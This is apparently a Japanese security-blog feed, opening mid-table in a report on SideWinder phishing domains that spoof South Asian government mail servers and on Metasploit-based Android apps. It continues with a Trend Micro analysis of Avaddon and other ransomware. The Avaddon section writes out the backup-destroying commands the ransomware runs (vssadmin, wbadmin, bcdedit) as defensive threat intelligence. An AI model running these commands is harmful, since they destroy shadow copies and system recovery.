2019年11月   ネパール国防省 mail.mod.gov.np 偽装元の正規メールサーバにリダイレクトする
2019年12月 mail-mofagovnp.zapto[.]org ネパール外務省 mail.mofa.gov.np Webニュース「China, Nepal sign trade, infrastructure and security deals」にリダイレクトする
2019年12月   ネパールの政府機関 mail.nepal.gov.np ファイル「consultation_1523857630.pdf」にリダイレクトする
2020年1月 imail.aop.gov-af[.]org アフガン国家安全保障会議 imail.aop.gov.af Webページ「Observation Of Technology Use in Afghanistan Government Sector」にリダイレクトする
2020年1月 mail-nscaf.myftp[.]org アフガン国家安全保障会議 mail.nsc.gov.af 「hxxps://wikipedia.org/USB_Killer」にリダイレクトする
2020年1月 mail-nepalarmymilnp.duckdns[.]org ネパール陸軍 mail.nepalarmy.mil.np PDF「EN Digital Nepal Framework V8.4 15 July 2019.pdf」にリダイレクトする
2020年1月 mail-mofagovnp.hopto[.]org ネパール外務省 mail.mofa.gov.np PDF「national-security-vol-3-issue-1-essay-SSimkhada.pdf」にリダイレクトする
2020年1月 webmail.mohe.gov-af[.]org アフガニスタン高等教育省 webmail.mohe.gov.af 偽装元の正規メールサーバにリダイレクトする
2020年2月   スリランカ国防省 mail.defence.lk ログイン時にエラーが生じる
2020年2月 mail.moha.gov-np[.]org ネパール内務省 mail.moha.gov.np 偽装元の正規メールサーバにリダイレクトする
2020年2月 mail.nsc.gov-af[.]org アフガン国家安全保障会議 mail.nsc.gov.af 偽装元の正規メールサーバにリダイレクトする
2020年2月 mail.arg.gov-af[.]org アフガニスタン大統領官邸 mail.arg.gov.af 偽装元の正規メールサーバにリダイレクトする
2020年2月 mail.arg.gov-af[.]org アフガニスタン大統領官邸 mail.arg.gov.af 偽装元の正規メールサーバにリダイレクトする
2020年2月   ネパール教育人材育成センター mail.doe.gov.np ファイル「Para Basic Course Joining Instruction.docx」にリダイレクトする
2020年3月 mail-nepalgovnp.duckdns[.]org ネパールの政府機関 mail.nepal.gov.np 偽装元の正規メールサーバにリダイレクトする
2020年3月   ネパール電力公社 mail.nea.org.np 偽装元の正規メールサーバにリダイレクトする
2020年3月 mail-nepalgovnp.duckdns[.]org ネパールの政府機関 mail.nepal.gov.np ファイル「central data form.pdf」にリダイレクトする
2020年3月 mail-nepalarmymilnp.duckdns[.]org ネパール陸軍 mail.nepalarmy.mil.np ファイル「Corona Virus Preparedness and Response.pdf」にリダイレクトする
2020年3月 mail-nepalpolicegov.hopto[.]org ネパール警察 mail.nepalpolice.gov.np ファイル「1987 Conducting training on COVID-19 and keeping it in readiness.pdf」にリダイレクトする
2020年4月 mail-nrborg.hopto[.]org ネパール中央銀行 mail.nrb.gov.np ファイル「fiu.pdf」にリダイレクトする
2020年5月 mail-nepalarmymilnp.duckdns[.]org ネパール陸軍 mail.nepalarmy.mil.np Webニュースサイト「India Should Realise China Has Nothing to Do With Nepal’s Stand on Lipulekh」にリダイレクトする
2020年6月 mail-nepalarmymilnp.duckdns[.]org ネパール陸軍 mail.nepalarmy.mil.np Login failed(ログイン失敗)とメッセージが表示される
2020年7月   パキスタンの医療センター「Qatar Charity」 mail.qcharity.org 偽装元の正規メールサーバにリダイレクトする
2020年7月   ミャンマー国営郵便・電気通信事業体「Myanma Posts and Telecommunications」 webmail.mpt.net.mm 偽装元の正規メールサーバにリダイレクトする
2020年8月 mail-ncporgnp.hopto[.]org ネパール共産党 mail.ncp.org.np ファイル「India reaction after new pak map.pdf」にリダイレクトする
2020年8月 mail-nscaf.myftp[.]org アフガン国家安全保障会議 mail.nsc.gov.af 「10[.]77[.]17[.]10/Software/03-Applications」にリダイレクトする
2020年9月 mail-mofgovnp.hopto[.]org ネパール財務省 mail.mof.gov.np ファイル「1987 Covid.pdf」にリダイレクトする
2020年9月 mail-ncporgnp.hopto[.]org ネパール共産党 mail.ncp.org.np ドキュメント「The spectre of a new Maoist conflict in Nepal」にリダイレクトする
2020年9月 imail.aop.gov-af[.]org アフガニスタン大統領事務局 imail.aop.gov.af ファイル「SOP of Military Uniform .pdf」にリダイレクトする
2020年10月 mail-nepalpolicegovnp.duckdns[.]org ネパール警察 mail.nepalpolice.gov.np ファイル「2077-07-03 1239 Regarding investigation and action.pdf」にリダイレクトする
2020年10月   ネパール民間航空局 mail.caanepal.gov.np 偽装元の正規メールサーバにリダイレクトする
2020年10月 mail-apfgovnp.ddns[.]net
mail-apfgavnp.hopto[.]org
ネパール武装警察 mail.apf.gov.np 偽装元の正規メールサーバにリダイレクトする
2020年10月 mail-nscaf.myftp[.]org アフガン国家安全保障会議 mail.nsc.gov.af ファイル「IT Services Request Form.pdf」にリダイレクトする
2020年11月 mail-ntcnetnp.serveftp[.]com 携帯電話通信事業者「ネパールテレコム」 webmail.ntc.net.np 偽装元の正規メールサーバにリダイレクトする
2020年11月 mail-kmgcom.ddns[.]net メディア企業グループ「Kantipur Media Group」 mail.kmg.com.np 偽装元の正規メールサーバにリダイレクトする
2020年11月   ネパール連邦議会 mail.parliament.gov.np 偽装元の正規メールサーバにリダイレクトする
2020年11月   ネパール国公共調達管理事務所 mail.ppmo.gov.np 偽装元の正規メールサーバにリダイレクトする
2020年11月 mail-mfagovcn.hopto[.]org 中国外交部 mail.mfa.gov.cn ファイル「Ambassador Yanchi Conversation with Nepali_Media.pdf」にリダイレクトする
図8:ネパール陸軍のOWA(Outlook Web Access)ページを偽装したSideWinderのフィッシングページ
図8:ネパール陸軍のOWA(Outlook Web Access)ページを偽装したSideWinderのフィッシングページ
図9:フィッシングページからのリダイレクト先および誘導手口として利用されたドキュメントの一例
図9:フィッシングページからのリダイレクト先および誘導手口として利用されたドキュメントの一例。インド・パキスタン間の領土問題について記述されている
図10:在中国ネパール大使へのインタビューの内容が記述されている、誘導手口に利用されたドキュメントの一例
図10:在中国ネパール大使へのインタビューの内容が記述されている、誘導手口に利用されたドキュメントの一例
Android向けアプリ

さらにトレンドマイクロは、SideWiderのサーバ上で、Android向けアプリのために作成された多数のAPKファイルを特定しました。興味深いことに、これらのAndroid向けアプリはデフォルトのAndroidアイコンのままで、基本的な機能のみで構成されており、まだ開発の初期段階にあるものと考えられ、ユーザにとっての実用的な機能は備えていません。

図11:APKファイルで使用されるデフォルトのAndroidアイコン
図11:APKファイルで使用されるデフォルトのAndroidアイコン

弊社はこれらのアプリの中から、「MyFirstAPP」と「OpinionPoll」という2つのアプリを見つけましたが、不正活動は含まれていないようです。図12[左半分]の「My First App」は、ログインページや登録画面を表示する一方、図12[右半分]の「OpinionPoll」はインド・ネパール間で続く国境紛争に関する世論調査を行うアプリとして機能します。「My First App」は未経験者用のAndroid向けデモ(試作)アプリである可能性が高く、「OpinionPoll」は「意見の書き方」の説明から始まり、その後にアンケート調査が続きます。

図12:不正活動を備えていないアプリ「MyFirstAPP」と「OpinionPoll」
図12:不正活動を備えていないアプリ「MyFirstAPP」と「OpinionPoll」

上記のほかに発見された2つのアプリ、アプリ内に設定されたリモートサーバから追加のコードを読み込むMetasploit用のJavaPayloadからビルドされました。こちらについてはペイロードを取得できませんでしたが、位置情報、連絡先、通話履歴など、プライバシーに関連する多数の権限を要求するマニフェストによると、ペイロードはユーザの個人データを追跡していると推測できます。これらの2つのアプリには、Metasploit以外の活動やその他のコンポーネントが存在しないため、デバッグバージョンであると考えられます。

図13:Metasploitからビルドされたのち、パーミッションを要求する様子
図13:Metasploitからビルドされたのち、パーミッションを要求する様子

また、クラス名が難読化されたMetasploitが追加されたアプリ「My FirstAPP」の不正バージョンを特定しました。

図14:難読化されたMetasploitが追加されたMyFirstAPPの不正バージョン
図14:難読化されたMetasploitが追加されたMyFirstAPPの不正バージョン

SideWinderは、過去に攻撃活動の一部に不正アプリを使用していました。前述したキャンペーンでSidewiderは、写真・ファイル管理ツールに偽装させた不正APKファイルを誘導手口に用いてユーザに不正APKファイルをダウンロードさせました。不正APKファイルがユーザのモバイル端末にダウンロードされると、一連の高度な攻撃の流れが始まります。この攻撃の流れの中には、感染モバイル端末をルート化してペイロードの存在を隠ぺいしながらデプロイするだけでなく、Android における解放済みメモリの使用に関する脆弱性「CVE-2019-2215」および脆弱性攻撃コード「MediaTek-SU」を利用してルート権限を取得する手口も含まれます。デプロイされたペイロードの最終目的は、感染モバイル端末から特定の情報を収集し、C&Cサーバに送り返すことです。

不正APKファイルを用いた新たな攻撃事例においても、ユーザ情報の収集が目的であると考えられます。過去にGooglePlayストアで確認された不正アプリとは異なり、SideWinderの不正サーバ上で発見されたすべてのAPKファイルは、意図する攻撃を実行するための機能が十分に備わっていないことがわかっています。弊社の見解では、これらのAPKファイルはまだ開発の初期段階にあり、モバイルユーザを標的としたペイロードは現在も高度化していると推測しています。

結論

SideWinderが用いるフィッシング攻撃の手口やAndroid端末を標的とした攻撃ツールの継続的な高度化から見られるように、SideWinderは標的を侵害するために、Covid-19や政治的な問題など最新情勢の話題をソーシャルエンジニアリングの手法に積極的に取り入れています。これに対しユーザや組織は、警戒を怠ることなく、ソーシャルエンジニアリングの手法に対するベストプラクティスに従うことで、これらの攻撃キャンペーンや類似する攻撃事例に直面した際に未然に被害を抑止できるようになります。

侵入の痕跡(Indicator of CompromiseIoC

今回の記事に関する侵入の痕跡はこちらを参照してください。

参考記事:

記事構成:岡本 勝之(セキュリティエバンジェリスト)

翻訳:益見 和宏(Core Technology Marketing, Trend Micro™ Research)

The post 領土問題をスピアフィッシングに利用するサイバー犯罪者集団「SideWinder」の手口 first appeared on トレンドマイクロ セキュリティブログ.
joan-gamell-XmZ4GDAp9G0-unsplash

Multi-Stage Programming、そして脆弱性レジリエンス × Clean Architecture 〜 ScalaMatsuri2020 登壇者インタビュー – Visional Engineering Blog

Multi-Stage Programming、そして脆弱性レジリエンス × Clean Architecture 〜 ScalaMatsuri2020 登壇者インタビュー - Visional Engineering Blog

Multi-Stage Programming、そして脆弱性レジリエンス × Clean Architecture 〜 ScalaMatsuri2020 登壇者インタビュー - Visional Engineering Blog

Multi-Stage Programming、そして脆弱性レジリエンス × Clean Architecture 〜 ScalaMatsuri2020 登壇者インタビュー 2020年10月17日(土) ~ 18日(日)にかけて開催された、アジア最大級のScalaカンファレンス “ScalaMatsuri 2020”。 Visionalからも2名のエンジニアが登壇をいたしました。 本日は「Dotty ではじめるマルチ...

はてなブックマーク - Multi-Stage Programming、そして脆弱性レジリエンス × Clean Architecture 〜 ScalaMatsuri2020 登壇者インタビュー - Visional Engineering Blog はてなブックマークに追加

joan-gamell-XmZ4GDAp9G0-unsplash

How To Secure Node.js Applications with a Content Security Policy | DigitalOcean

How To Secure Node.js Applications with a Content Security Policy | DigitalOcean

How To Secure Node.js Applications with a Content Security Policy | DigitalOcean

The author selected the Free Software Foundation to receive a donation as part of the Write for DOnations program. Introduction When the browser loads a page, it executes a lot of code to render the content. The code could be from the same origin as the root document, or a different origin. By de...

はてなブックマーク - How To Secure Node.js Applications with a Content Security Policy | DigitalOcean はてなブックマークに追加

joan-gamell-XmZ4GDAp9G0-unsplash

Masato Kinugawa Security Blog: DiscordデスクトップアプリのRCE

Masato Kinugawa Security Blog: DiscordデスクトップアプリのRCE

Masato Kinugawa Security Blog: DiscordデスクトップアプリのRCE

数か月前、ゲームのコミュニティなどで人気のチャットアプリ「Discord」のデスクトップ用アプリケーションに任意のコードを実行可能な問題を発見し、Bug Bounty Programを通じて報告しました。発見したRCEは、複数のバグを組み合わせることによって達成される面白いものだったので、この記事では、その詳細を共有したい...

はてなブックマーク - Masato Kinugawa Security Blog: DiscordデスクトップアプリのRCE はてなブックマークに追加

h-heyerlein-ndja2LJ4IcM-unsplash

2020年上半期ランサムウェア動向拾遺:「Avaddon」、新たな回避手法、業界別被害事例、など

2020年に入っても、ランサムウェアは新たなファミリや攻撃手法、標的対象を次々と生み出し、今なお大きな脅威であり続けています。今回公開したトレンドマイクロの「2020年上半期セキュリティラウンドアップ」でも、「ランサムウェアの新たな戦略」として報告しておりますが、レポートではお伝えしきれなかった動向もありました。本記事では、新たに活発なメール経由の拡散が見られたランサムウェアファミリ「Avaddon(アヴァドン)」、一部のランサムウェアの亜種が実行する新たな検出回避手法、ランサムウェア攻撃が影響を与えた業界、検出数が最も多いランサムウェアファミリなどのランサムウェア動向をまとめて解説します。

図1:Avaddonの拡散活動に用いられた電子メールの例
図1:Avaddonの拡散活動に用いられた電子メールの例

■Avaddonランサムウェア

Avaddonと呼ばれる新たなランサムウェア(「Ransom.Win32.AVADDON.YJAF-A」として検出)が確認されています。拡散経路としてはメール経由のばらまき攻撃であり、JavaScriptファイル「IMG {ランダムな数字6文字} .jpg.js.zip」を含む不正ファイル「IMG{ランダムな数字6文字}.jpg.js.zip」が添付された電子メールを介して拡散されました。メールの添付ファイルとしてコンピュータ内に侵入したトロイの木馬型マルウェア(「Trojan.JS.AVADDON.YJAF-A」として検出)が、このランサムウェアを不正なWebサイトからダウンロードしてシステム上で実行します。これについては、弊社マルウェア解析者による一連のTwitter投稿でも報告されています。日本でも6月前後にAvaddonを拡散するマルウェアスパムが頻繁に確認されましたが、現在のところ顕著な被害拡大は見られていません。

Avaddonの拡散活動(キャンペーン)に用いられた電子メールは、特定の件名を使用してユーザの好奇心を刺激し、メッセージを開いて添付ファイルをダウンロードするよう誘導します。前出の図1に示すように、メール本文には1つの顔文字「;)」のみ含まれています。この本文が顔文字のみのマルウェアスパムは過去のマルウェアキャンペーンの攻撃手口を踏襲しています。直近の事例としては2019年にも見られていますが、その時は別のランサムウェア「GandCrab」を拡散させるものでした。これらのマルウェアスパムの多くには、写真に関する内容が件名に記されており、カメラ内蔵型端末が広く浸透する現在では、ユーザがメールに興味を持つ可能性が大いにあります。

  • Look at this photo!(この写真見てよ!)
  • Photo just for you(あなたに宛てた写真です)
  • You look good here(綺麗に映ってるね)
  • I love this photo(この写真、すごくいいね)
  • I like this photo(この写真いいと思うな)
  • Is this your photo?(これ、あなたの写真?)
  • Is this you?(これに写ってるの、あなた?)
  • My favourite photo(わたしのお気に入りの写真です)
  • You like this photo?(あなたはこの写真、いいと思う?)

この添付ファイルを実行した場合、トロイの木馬型マルウェアはPowerShellコマンドおよびBITSAdminコマンドラインツールを不正に利用して、ペイロードであるランサムウェアをダウンロードして実行します。その後ユーザは、ランサムウェアによってファイルが暗号化され、ファイル拡張子に「.avdn」が付加されたことに気付くことになります。ユーザは、自身のシステム画面の壁紙が自動的に「All your files has been encrypted(すべてのファイルは暗号化されました)」と記された画像に変更され、身代金要求文書「Instruction 270015-readme.html」({暗号化されたディレクトリ} \ {ランダムな数字} -readme.html形式のファイル)を確認するよう指示が与えられます。

図2:Avaddonの攻撃によって変更されたユーザの壁紙
図2:Avaddonの攻撃によって変更されたユーザの壁紙

身代金要求文書(ランサムノート)には、感染システムを利用するユーザがどのような手順を取れば暗号化されたファイルを復元できるかについて記されています。

図3:Avaddonが用いる身代金要求文書
図3:Avaddonが用いる身代金要求文書

このランサムウェアは、以下のフォルダ内に存在するファイルを暗号化します。

  • Program Files\Microsoft\Exchange Server
  • Program Files (x86)\Microsoft\Exchange Server
  • Program Files\Microsoft SQL Server
  • Program Files (x86)\Microsoft SQL Server

またランサムウェアは、感染システムのバックアップコピーを削除するために以下のプロセスを追加し、復元を困難にします。

  • wmic.exe SHADOWCOPY /nointeractive
  • wbadmin DELETE SYSTEMSTATEBACKUP
  • wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
  • bcdedit.exe /set {デフォルト} recoveryenabled No
  • bcdedit.exe /set {デフォルト} bootstatuspolicy ignoreallfailures
  • vssadmin.exe Delete Shadows /All /Quiet

さらにランサムウェアは、特定のサービスとプロセスを終了します。これらの多くは、ファイルスキャン、保存または取得、あるいはタスクスケジュールに関連しています。以下にいくつかの例を示します。

終了させるサービス:

  • ccEvtMgr
  • ccSetMgr
  • Culserver
  • dbeng8
  • dbsrv12
  • DefWatch
  • Intuit.QuickBooks.FCS
  • msmdsrv
  • QBCFMonitorService
  • QBIDPService

終了させるプロセス:

  • 360doctor.exe
  • 360se.exe
  • axlbridge.exe
  • BCFMonitorService.exe
  • Culture.exe
  • Defwatch.exe
  • fdhost.exe
  • fdlauncher.exe
  • GDscan.exe
  • httpd.exe

ランサムウェアは、WindowsロケールIDが以下の値と等しい場合、自身を終了します。

  • 419 = ロシア語
  • 422 = ウクライナ語

ランサムウェアは、システムが以下のキーボードレイアウトと言語バーに設定されている場合、自身を終了します。

  • 419 = ロシア語
  • 485 = ヤクート(ロシア)
  • 444 = タタール語
  • 422 = ウクライナ語

これらAvaddonが行う特定の国で利用されるシステムへの攻撃を回避する手法は、他のマルウェア、例えばMedusaLockerランサムウェアでも観察されています。

Avaddonに関連するプロセスやサービスの一覧、およびランサムウェアの詳細については、トレンドマイクロの脅威データベースをご参照ください。

■新たな攻撃手法「反射型DLLインジェクション」と「仮想マシン利用」

新たなランサムウェアファミリの顕著な増加が確認される2020年1~5月の間で、一部のランサムウェア検出回避に利用する攻撃手法もアップデートされています。たとえば、ランサムウェア「Netwalker」は、リフレクティブダイナミックリンクライブラリ(DLL)インジェクション(別名:リフレクティブDLLロード、反射型DLLインジェクション)を介してファイルレス活動を可能にします。この手法はDLLをディスクからではなくメモリからインジェクションします。この手口は2020年5月に台湾企業への攻撃が確認されたランサムウェア「ColdLock」でも使用されており、より高度なファイルレス活動を実現する手法として注意が必要です。

もう1つの注目すべき高度化された回避手法は、ランサムウェア「Ragnar Locker」の攻撃で使用された仮想マシンを展開する手法でしょう。この攻撃ではRagnar Lockerを含む仮想マシンのイメージがインストールされ、仮想マシン内部でRagnar Lockerが実行されます。セキュリティベンダ「Sophos」によると、この攻撃手法は、これまでどの種類のランサムウェアも利用したことのない方法です。これまでのRagnar Lockerは、マネージドサービスプロバイダ(MSP)またはWindowsリモートデスクトッププロトコル(RDP)の脆弱性を利用して攻撃活動を行っていました。

■業界別被害事例

2020年1~5月の間に報告されたランサムウェア事例を見ると、世界的に製造や物流、エネルギー業界の複数の企業での被害が目立っています。一例としてランサムウェア「Ekans」は、製造業を狙ったとされる複数の攻撃で利用されました。サイバーセキュリティ企業「Dragos」が確認したように、過去にEkansの攻撃によって企業プロセスが機能停止した事例において、ある程度の意図性が存在したことは明らかです。これを踏まえ、Ekansは産業制御システム(ICS)を活用する組織が注意を向けるべき脅威です。

ファイルを暗号化して復号キーと引き換えに身代金を要求するだけでなく、事前に窃取した機密データを一般公開すると脅し文句を加える二重の脅迫手法を採用したランサムウェア「Nefilim」は、物流企業での被害が確認されています。これらの攻撃を弊社が調査した結果、最近新たに確認されたランサムウェアの不正活動、特にデータ窃取に関する詳細が明らかとなりました。このデータ窃取活動は、実際にランサムウェアが展開される数週間または数カ月前から始まっており、攻撃時には不正あるいは正規ツールを複数使用してプロセスを展開し、ネットワークを介して水平移動(情報探索)することが確認されました。同様の「情報暴露型」の事例としては、ランサムウェア「Sodinokibi」を背後で操る攻撃者が英国の送配電事業者の従業員のパスポート情報などを含む文書ファイルをTorのWebページ上で公開したことです。同事業者はこの出来事の数週間前にランサムウェアの攻撃により業務が妨害されていました。

一方、弊社がColdLockと名付けた別のランサムウェア(「Ransom.MSIL.COLDLOCK.YPAE-A」として検出)は、特定の業界だけでなく、特定の地域を標的としました。具体的にこのランサムウェアは、データベースおよび電子メールサーバの暗号化を狙って台湾の組織に攻撃を仕掛けていました。

■世界的統計データから見るランサムウェア脅威

トレンドマイクロのクラウド型セキュリティ技術基盤「Smart Protection Network(SPN)」の統計によれば、2020年5月、ランサムウェア「WannaCry」の検出は全世界で15,496件確認され、最も多く検出されたランサムウェアファミリとなりました。WannaCryが最も多くの検出数を保持している理由は、自律的なワーム活動(横展開)を可能にさせるコンポーネントと、マルウェアを定期的に拡散させようと試みる攻撃者の意図により確立される持続性に起因している可能性があります。トレンドマイクロは、新たに大規模な脅威をもたらすランサムウェアが出現するか、WannaCryのソースが発見されて削除されるまでは、WannaCryが現状のような多くの検出数を維持し続けていくと予測しています。

WannaCryに続くのが、1,532件検出された「Locky」、そして392件検出された「Cerber」です。実際これらのランサムウェアファミリは、2020年1月以来、常に上位3位に入っています。また、2019年のランサムウェアの検出総数でも上位3位にその名を連ねています。

図4:検出数が最も多かったランサムウェアファミリ別の上位データ(2020年5月)
図4:検出数が最も多かったランサムウェアファミリ別の上位データ(2020年5月)

部門別では、大企業での検出数が最も多く、18,000件を超えました。一方、コンシューマでの検出数は4,000件、中小企業での検出数は1,000件を超えています。

図5:ランサムウェアが検出された部門別の上位データ(2020年5月)
図5:ランサムウェアが検出された部門別の上位データ(2020年5月、SPNの検出製品を元に分類)
 ■被害に遭わないために

ランサムウェアが企業にもたらす脅威の一部を挙げるとすれば、製造機器の機能停止による生産性の損失やデータ損失、あるいは企業の機密データが暴露されることで生じる信用性の低下および金銭的損害でしょう。しかし企業は、これらの脅威から組織を保護する対策方法を見出すことができます。

ランサムウェアからシステムを保護するために講じるべきベストプラクティスの一部を以下に示します。

  • アプリケーションとソフトウェアに修正プログラム(パッチ)を適用するため、定期的にアップデートしましょう。これにより、既知の脆弱性に確実に対処できます。速やかにアップデートできない場合、またゼロデイ脆弱性が利用される可能性については、仮想パッチなどの技術的緩和策も検討してください
  • 従来型のウイルス検出機能だけでなく、セキュリティソリューションが備える機械学習や挙動監視技術などの新たな対策技術を有効化しましょう。また可能であればサンドボックス分析を有効化しましょう
  • バックアップの際には「3-2-1のルール」を実践しましょう。3つ以上のバックアップを定期的に作成し、2つの異なるメディア内に保存し、そのうちの1つを他の2つのコピーとは別の場所に、可能ならネットワークから隔離された場所に保存してください
■トレンドマイクロの対策

トレンドマイクロのセキュリティソリューションの中でもランサムウェアへの対策として推奨されるものを以下に示します。

法人向けのエンドポイント製品「Trend Micro Apex One™」や中小企業向けのクラウド型エンドポイントセキュリティサービス「ウイルスバスター™ビジネスセキュリティサービス」では、「FRS」技術によりウイルス検出と同時に、機械学習型検出や挙動監視機能(不正変更監視機能)の強化により、侵入時点で検出未対応のランサムウェアであっても警告可能です。特に「Trend Micro Apex One™」は事前防御(EPP)と事後対応(EDR)を統合し、高い防御力を実現します。また、クロスジェネレーション(XGen)セキュリティアプローチにより、高い検出率と誤検出/過検出の回避を両立しつつ、コンピュータへの負荷軽減を実現します。

Deep Discovery™ Email Inspector」や「Trend Micro Cloud App Security™」などのメール対策製品、「Trend Micro Web Security as a Service – Advanced」などのWeb対策製品で使用可能なサンドボックス機能も未対応のランサムウェアの検出に有効です。

Trend Micro XDR」のセキュリティサービスは、Managed XDRチームによる24時間年中無休の監視と専門家による分析を提供することで、セキュリティを強化します。これには、メール、エンドポイント、サーバ、クラウドワークロード、およびネットワークが含まれます。チームは高度な分析と人工知能(AI)技術を使用して、アラートを相関させ、深刻度のレベルに応じて優先順位を付けます。これにより、企業は攻撃がどのように開始され、どの程度拡散しているかを理解し、これらの脅威に対処するための手段を定めることが可能です。

■侵入の痕跡 (Indicators of Compromise)

本記事で紹介した「Avaddon」ランサムウェアに関連する侵入の痕跡(IoC)の一覧は、こちらをご参照ください。

参考記事:

記事構成:岡本 勝之(セキュリティエバンジェリスト)

翻訳:益見 和宏(Core Technology Marketing, Trend Micro™ Research)

The post 2020年上半期ランサムウェア動向拾遺:「Avaddon」、新たな回避手法、業界別被害事例、など first appeared on トレンドマイクロ セキュリティブログ.

cropPAK0I9A7880

Google Developers Japan: URL のなりすましを見つけやすくする Chrome の試験運用について

Google Developers Japan: URL のなりすましを見つけやすくする Chrome の試験運用について

Google Developers Japan: URL のなりすましを見つけやすくする Chrome の試験運用について

.app 1 .dev 1 #11WeeksOfAndroid 11 #Android11 2 #DevFest16 1 #DevFest17 1 #DevFest18 1 #DevFest19 1 #hack4jp 3 A/B Testing 1 A4A 4 Accelerator 1 Accessibility 1 Actions on Google 16 Activation Atlas 1 Addy Osmani 1 ADK 2 AdMob 31 Ads 59 Ads API 52 Advanced Protection Program 2 AdWords API 11 Agen...

はてなブックマーク - Google Developers Japan: URL のなりすましを見つけやすくする Chrome の試験運用について はてなブックマークに追加

h-heyerlein-ndja2LJ4IcM-unsplash

Google Developers Japan: ウェブ エコシステムの根本的なセキュリティ保護に向けて

Google Developers Japan: ウェブ エコシステムの根本的なセキュリティ保護に向けて

Google Developers Japan: ウェブ エコシステムの根本的なセキュリティ保護に向けて

.app 1 .dev 1 #11WeeksOfAndroid 7 #Android11 1 #DevFest16 1 #DevFest17 1 #DevFest18 1 #DevFest19 1 #hack4jp 3 A/B Testing 1 A4A 4 Accelerator 1 Actions on Google 16 Activation Atlas 1 Addy Osmani 1 ADK 2 AdMob 31 Ads 59 Ads API 52 Advanced Protection Program 2 AdWords API 11 Agency 1 AI 12 AIY 3 ...

はてなブックマーク - Google Developers Japan: ウェブ エコシステムの根本的なセキュリティ保護に向けて はてなブックマークに追加

joan-gamell-XmZ4GDAp9G0-unsplash

Microsoft now detects CCleaner as a Potentially Unwanted Application

Microsoft now detects CCleaner as a Potentially Unwanted Application

Microsoft now detects CCleaner as a Potentially Unwanted Application

HomeNewsMicrosoftMicrosoft now detects CCleaner as a Potentially Unwanted Application Microsoft is now detecting the popular CCleaner Windows optimization and Registry cleaner program as a potentially unwanted application (PUA) in Microsoft Defender. CCleaner is a junk file remover, Registry clea...

はてなブックマーク - Microsoft now detects CCleaner as a Potentially Unwanted Application はてなブックマークに追加